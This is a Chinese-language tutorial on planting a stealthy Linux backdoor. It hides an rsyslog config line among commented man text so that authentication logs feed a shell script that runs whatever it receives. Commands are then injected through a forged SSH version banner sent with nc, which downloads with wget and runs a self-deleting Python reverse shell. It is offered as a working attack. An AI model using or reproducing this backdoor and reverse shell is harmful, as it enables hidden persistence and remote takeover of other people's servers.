0×01. 關于Rsyslog
ryslog 是一個快速處理收集系統日志的程序,提供了高性能、安全功能和模塊化設計。rsyslog 是syslog 的升級版,它將多種來源輸入輸出轉換結果到目的地,據官網介紹,現在可以處理100萬條信息。
特性:
1.多線程
2.支持加密協議:ssl,tls,relp
3.mysql、oracle、postgreSQL
4.等等..
一般主流的Linux發行版本中都會自帶Rsyslog服務,本文則利用這個常見的日志服務隱藏系統后門
0×02. 實例演示利用Rsyslog 隱藏系統后門
試驗環境
10.1.100.1 遠程服務器,提供反彈py腳本下載 (windows7)
10.1.100.2 控制端 (centos)
10.1.100.3 被控端 (kali)
一、被控端配置
1. 給rsylog添加后門配置文件
在被控端 上執行以下命令(假設你已經獲取victim的 root權限)
man -a rsyslogd syslog | sed 's/^/#&/g' | sed '187 aauth.* ^/bin/snmp #' > /etc/rsyslog.d/README.conf
這串命令的意思試講 關于rsyslogd syslog的所有man 幫助信息導入到/etc/rsyslog.d 目錄下的README.conf文件中,且在README.conf 文件的188行寫入
auth.* ^/bin/snmp #
命令中之所以寫成aauth, 是因為a是sed的中的關鍵字,被自動過濾掉,所以要多寫一個
命令執行完之后的,結果如下:
我們知道 Rsyslog 服務會將/etc/resyslog.d 目錄下的*.conf 文件都認為是配置文件, 這里將名字定為 README.conf 也是增強迷惑性(當然你也可以找到rsyslog的配置文件,然后修改這個配置文件)
我們來看配置文件中唯一一行沒有被注釋掉的代碼
auth.* ^/bin/snmp #
之所以將其放在188行,因為一般人看到這么多注釋行,不會繼續往下翻, 將配置行 放在這里不容易被發現
其中auth 表示的是PAM認證產生的日志
auth.* ^/bin/snmp # 的意思是將 PAM 產生的所有日志都發往/bin/snmp 程序
這里的/bin/snmp 就是我們留下的后門,snmp也是為了增強迷惑性而命名的
2. 編寫后門代碼
后門是一個很簡單,設置可以說是簡陋的sh腳本, 代碼如下:
#!/bin/sh
sh -c "$1"
$1 表示傳給腳本的第1個參數內容
-c 表示將 $1的字符串內容當做sh命令執行
別忘了給后門增加可執行權限
chmod 755 /bin/snmp
3. 重啟rsyslog 服務
systemctl restart rsyslog
至此 被控端配置完畢
二、控制端配置
一般的系統都會開放SSH 服務,而且ssh 是基于PAM認證的,所以ssh認證登錄中產生的日志都會發往 /bin/snmp
1. 在控制端執行監聽,等待shell反彈
2. 在控制端執行如下命令,下載反彈py腳本,并保存在被控端的/tmp/x.py:
echo "';wget http://10.1.100.1/x.py -O /tmp/x.py;'"|nc 10.1.100.3 22
我們知道ssh 協議在通信的時候首先需要交換ssh版本信息,已確定是否可以通信
所以這里 ‘;wget http://10.1.100.1/x.py -O /tmp/x.py;’ 相當于向victim (10.1.100.3) 宣告自己的ssh版本(顯然這里是偽造的,但這不重要),這個版本宣告信息會被rsyslog捕獲,并將其傳至/bin/snmp, /bin/snmp 會將;wgethttp://10.1.100.1/x.py -O /tmp/x.py;視為入參, 然后執行腳本
也即:
sh -C ";wget http://10.1.100.1/x.py -O /tmp/x.py;"
不知道你注意到沒,這里在wget 的命令前后加上;目的是為了防止ssh通信中其他日志信息干擾wget 命令執行
x.py 代碼如下:
import os
import pty
import socket
lhost = "10.1.100.2" # XXX: CHANGEME
lport = 31337 # XXX: CHANGEME
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
os.remove('/tmp/x.py') # 退出后銷毀自身
s.close()
if __name__ == "__main__":
main()
命令執行結果:
被控端查看,下載成功
4. 執行x.py, 反彈shell
控制端執行:
echo "';python /tmp/x.py;'"|nc 10.1.100.3 22
控制端查看,獲取shell
| 
